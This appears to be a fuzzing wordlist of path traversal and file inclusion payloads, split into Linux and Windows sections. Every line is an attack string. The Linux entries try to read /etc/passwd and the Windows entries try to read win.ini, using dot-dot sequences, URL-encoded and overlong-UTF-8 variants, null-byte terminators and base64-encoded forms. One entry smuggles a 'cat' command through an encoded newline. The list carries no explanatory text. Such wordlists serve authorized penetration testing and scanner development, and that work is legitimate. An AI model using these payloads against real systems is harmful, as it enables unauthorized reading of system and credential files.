[Linux]
%00../../../../../../etc/passwd
%00/etc/passwd%00
%0a/bin/cat%20/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/./././././././././././etc/passwd
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/passwd^^
/..\../..\../..\../..\../..\../..\../etc/passwd
/etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../etc/passwd
../../../../etc/passwd
../../../etc/passwd
../../etc/passwd
../etc/passwd
..\..\..\..\..\..\..\..\..\..\etc\passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
\..\..\..\..\..\..\..\..\..\..\etc\passwd
etc/passwd
/etc/passwd%00
../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../etc/passwd%00
../../../../../../../../../etc/passwd%00
../../../../../../../../etc/passwd%00
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
Li4vZXRjL3Bhc3N3ZA==
Li4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
[Windows]
%00../../../../../../etc/win.ini
%00/win.ini%00
%0a/bin/cat%20/win.ini
C:/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/win.ini
C:/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/win.ini
C:/./././././././././././win.ini
C:/../../../../../../../../../../win.ini
C:/../../../../../../../../../../win.ini^^
C:/..\../..\../..\../..\../..\../..\../win.ini
C:/win.ini
../../../../../../../../../../../../win.ini
../../../../../../../../../../../win.ini
../../../../../../../../../../win.ini
../../../../../../../../../win.ini
../../../../../../../../win.ini
../../../../../../../win.ini
../../../../../../win.ini
../../../../../win.ini
../../../../win.ini
../../../win.ini
../../win.ini
../win.ini
..\..\..\..\..\..\..\..\..\..\win.ini
.\\./.\\./.\\./.\\./.\\./.\\./win.ini
C:\..\..\..\..\..\..\..\..\..\..\win.ini
win.ini
C:/Windows/win.ini%00
../../../../../../../../../../../../../../../../../../../../../../win.ini%00
../../../../../../../../../../../../../../../../../../../../../win.ini%00
../../../../../../../../../../../../../../../../../../../../win.ini%00
../../../../../../../../../../../../../../../../../../../win.ini%00
../../../../../../../../../../../../../../../../../../win.ini%00
../../../../../../../../../../../../../../../../../win.ini%00
../../../../../../../../../../../../../../../../win.ini%00
../../../../../../../../../../../../../../../win.ini%00
../../../../../../../../../../../../../../win.ini%00
../../../../../../../../../../../../../win.ini%00
../../../../../../../../../../../../win.ini%00
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/win.ini
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/win.ini
....\/....\/....\/....\/....\/....\/....\/....\/....\/win.ini
....\/....\/....\/....\/....\/....\/....\/....\/win.ini
....\/....\/....\/....\/....\/....\/....\/win.ini
....\/....\/....\/....\/....\/....\/win.ini
....\/....\/....\/....\/....\/win.ini
....\/....\/....\/....\/win.ini
....\/....\/....\/win.ini
....\/....\/win.ini
....\/win.ini